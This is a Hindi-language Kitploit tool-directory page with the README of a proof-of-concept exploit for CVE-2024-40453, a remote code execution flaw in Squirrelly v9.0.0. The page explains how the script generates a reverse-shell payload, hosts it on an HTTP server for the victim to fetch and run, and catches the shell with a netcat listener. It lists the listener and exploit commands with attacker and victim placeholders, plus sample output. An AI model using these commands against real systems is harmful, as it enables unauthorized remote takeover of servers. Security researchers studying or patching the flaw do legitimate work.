Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-40453 — CVE-2024-40453 - Squirrelly v9.0.0 RCE. Poc | Kitploit
उपकरण/GitHubGitHub/bwithe/cve-2024-40453
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubbwithe/cve-2024-40453

CVE-2024-40453

CVE-2024-40453 - Squirrelly v9.0.0 RCE. Poc

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-40453 - Squirrelly v9.0.0 RCE

अस्वीकरण:

यह स्क्रिप्ट केवल शैक्षणिक उपयोग के लिए है।

इसका अवैध उद्देश्यों के लिए उपयोग न करें।

यदि आप ऐसा करते हैं, तो यह पूरी तरह से आपकी जिम्मेदारी है; मैं किसी भी दुरुपयोग के लिए उत्तरदायी नहीं हूँ।

विवरण

यह स्क्रिप्ट वर्तमान निर्देशिका में payload.sh नामक एक रिवर्स शेल बनाती है।

फिर यह पीड़ित द्वारा payload.sh को खींचने के लिए पोर्ट 80 पर एक HTTP सर्वर होस्ट करती है।

हमलावर की मशीन पर एक लिसनर प्रारंभ करने की आवश्यकता होती है।

HTTP सर्वर पीड़ित को payload.sh खींचने और निष्पादित करने की अनुमति देने के लिए 3 सेकंड के बाद बंद हो जाता है।

एक्सप्लॉइट का स्पष्टीकरण

निम्नलिखित जानकारी के आधार पर, यह POC विकसित किया गया था। https://samuzora.com/posts/cve-2024-40453

उपयोग

अपना लिसनर प्रारंभ करें

root@kitploit:~
rlwrap nc -nvlp 3000

पेलोड निष्पादित करें

root@kitploit:~
# python3 poc.py -rhost <VICTIM_IP> -rport <VICTIM_PORT> -lhost <ATTACKER_IP> -lport <ATTACKER_LISTENER_PORT>

python3 poc.py -rhost 172.16.0.2 -rport 3000 -lhost 172.16.0.1 -lport 3000
[+] Payload created at payload.sh
[*] Hosting HTTP server on port 80
[*] Triggering remote execution
172.16.0.2 - - [13/Jun/2025 22:21:10] "GET /payload.sh HTTP/1.1" 200 -
[*] Shutting down HTTP server on port 80
[!] Check your listener!

टूल डाउनलोड करें